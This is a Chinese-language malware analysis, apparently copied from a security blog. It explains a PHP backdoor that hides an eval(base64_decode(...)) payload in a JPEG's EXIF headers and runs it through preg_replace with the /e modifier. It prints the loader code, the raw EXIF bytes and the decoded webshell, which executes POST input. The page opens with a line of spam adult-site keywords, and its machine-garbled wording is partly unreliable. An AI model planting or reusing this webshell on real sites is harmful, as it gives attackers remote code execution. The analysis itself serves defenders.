国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　這是一個(gè)很是有趣的后門，它并沒有依托正常模式往隱躲起內(nèi)容(好比 base64/gzip 編碼)，可是它卻把本身的數(shù)據(jù)隱躲在JPEG圖片的EXIT頭部中了。它也利用exif_read_data和preg_replace兩個(gè)PHP函數(shù)來讀取EXIF頭部和履行。

　　手藝細(xì)節(jié)

　　這個(gè)后門可分為兩部門。第一部門是 exif_read_data 函數(shù)讀取圖片頭部，preg_replace 函數(shù)來履行內(nèi)容。下面是我們在被攻破網(wǎng)站上發(fā)現(xiàn)的代碼：

　　$exif =exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');

　　preg_replace($exif['Make'],$exif['Model'],'');

　　這兩個(gè)函數(shù)本身是無害滴。exif_read_data 函數(shù)常常利用來讀取圖片，preg_replace 函數(shù)是替代字符內(nèi)容。不外，preg_replace 函數(shù)函數(shù)有個(gè)隱躲并奧妙的選項(xiàng)，假定你傳進(jìn) “/e”，它會(huì)履行 eval() 中的內(nèi)容，就不是往查詢/替代了。

　　所以我們在查看bun.jpg文件時(shí)，發(fā)現(xiàn)后門的第二部門：

　　^@^PJFIF^@^A^B^@^@d^@d^@^@á^@Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@eval(base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd

　　HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));

　　@^@^QDucky^@^A^@^D^@^@^@<^@^@^@^NAdobe^

　　這個(gè)文件用以常見的頭部開端，可是在 ”make” 頭部中混進(jìn)了希罕的關(guān)頭字 ”/.*/e” 。有了這個(gè)履行潤色符， preg_replace 會(huì)履行 eval() 中傳進(jìn)的肆意內(nèi)容。

　　工作變得開端有趣了……

　　假定我們繼續(xù)來看看 EXIF 數(shù)據(jù)，我們能發(fā)現(xiàn)， “eval ( base64_decode”隱躲在 ”Model“ 頭部。把這些放在一路看，我們就知道如何回事了。報(bào)復(fù)打擊者是從 EXIF 中讀取 Make 和 Model 頭部信息，然后傳進(jìn)到 preg_replace 函數(shù)。只要我們點(diǎn)竄 $exif['Make'] 和 $exif['Model'] ，就獲得了最終的后門。

　　preg_replace ("/.*/e",,"@ eval ( base64_decode("aWYgKGl ...");

　　解碼后我們可以看到是履行 $_POST["zz1"] 供給的內(nèi)容。完全解碼后的后面在這里。

　　if(isset($_POST["zz1"])){eval(stripslashes($_POST["zz1"]..

　　隱躲歹意軟件

　　別的一個(gè)成心思的是，當(dāng)然 bun.jpg 和其他圖片文件被點(diǎn)竄了，但然后能加載并正常工作。實(shí)際上，在這些被攻破的站點(diǎn)，報(bào)復(fù)打擊者點(diǎn)竄了站點(diǎn)上一個(gè)合法并之前就存在的圖片。這是一種奇特的隱躲歹意軟件的編制。